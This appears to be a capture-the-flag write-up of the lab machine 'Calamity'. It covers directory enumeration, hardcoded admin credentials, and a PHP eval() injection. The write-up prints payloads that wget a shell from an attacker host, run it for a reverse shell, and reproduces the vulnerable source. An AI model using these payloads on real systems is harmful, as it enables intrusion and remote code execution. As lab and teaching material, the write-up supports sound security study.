10.10.10.27 - Calamity - php command injection

PHP code injection, Privilege Escalation through groups
Summary:                                                                                                                                                                                                                                                            
      vulnerable software : Vulnerability in the PHP code
      system vulnerable : 10.10.10.27
      vulnerability explanation :
      privilege escalation: LXD user given root permissions 
      severity : critical
Enumeration with nmap and masscan:
I used opendoor.py to discover critical directories that led to server compromise later on:
Command run: 
python ./opendoor.py --host 10.10.10.27 -s directories -t 50
Credentials exposed in the source code of admin.php:
​
Successful login with user:admin and password:skoupidotenekes and command injection when using <?php phpinfo() ?> in "Your HTML" form:
​
Gaining Access:
Since we have a command injection in a PHP code we can issue to download a shell x.php:
<?php echo shell_exec("wget http://10.10.14.16:8000/x.php -O /var/tmp/x.php 2>&1");?>
wget saving shell to /var/tmp/x.php
In the same manner execute: <?php echo shell_exec("php /var/tmp/x.php 2>&1");?> to gain a reverse shell on the port we set up earlier:
Content of admin.php responsbile for command injection:
www-data@calamity:/var/www/html$ cat admin.php
cat admin.php
<?php
​
if (!isset($_COOKIE['adminpowa'])) {
?>
<html><body>
​
<form method="post">
Password: <input type="text" name="user"><br>
Username: <input type="password" name="pass">
  <input type="submit" value="Log in to the powerful administrator page">
																											<!-- password is:skoupidotenekes-->
</form> 
</body></html>
<?php
if(isset($_POST['user']) && isset($_POST['pass'])){
$u = $_POST['user'];
$p = $_POST['pass'];
​
if ($u=="admin" && $p=="skoupidotenekes") {setcookie("adminpowa", "noonecares"); header("refresh: 0;");}
else{echo "GET OUT OF HERE ";}
}
​
​
}
?>
​
<?php
if (isset($_COOKIE['adminpowa'])) {
?>
​
<html>
<title>GOT U BEEJAY</title>
<body>
TADAA IT HAS NOTHING
<br>
what were you waiting for dude ?you know I aint finished creating<br>
xalvas,the boss said I am a piece of shit and that I dont take my job seriously...but when all this is set up...Ima ask for double the money<br>
just cauz he insulted me <br>
Maybe he's still angry at me deleting the DB on the previous site...he should keep backups man ! 
<br>
anyway I made an html interpreter to work on my php skills !
​
It wasn't easy I assure you...I'm just a P-R-O on PHP !!!!!!!!!
<br>
access in here is like 99% secure ,but even if that 1% reaches this page ,there's nothing they can do ! 
<br>
html is super-harmless to our system!
Try writing some simple stuff ...and see how difficult my job is and how underpaid I am
​
​
​
<form method="get">
Your HTML: <input type="text" name="html"><br>
  <input type="submit" value="SHOW ME DA PAGE">
</form> 
</body></html>
<?php
//print "\$myvar=\"test\";phpinfo();\n";
$x = $_GET['html'];
$cmd="?>" . $x;
eval($cmd); //what could possibly go wrong ? 
//echo $myvar;
​
}
?>
Explanation of the vulnerable part of the code:
​
eval [arg ...]
    The  args  are read and concatenated together into a single com-
    mand.  This command is then read and executed by the shell,  and
    its  exit status is returned as the value of eval.  If there are
    no args, or only null arguments, eval returns 0.
On a different note, mysterious recording recov.wav contains "never give you up by rick astley". Well done there.
Privilege escalation:
1) Look at the differences in wav files
2) Privesc through groups:
 uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
​
 
10.10.10.11 - Arctic - LFI, Win2008 Priv Esc
10.10.10.46 - Apocalyst
Last updated 11 months ago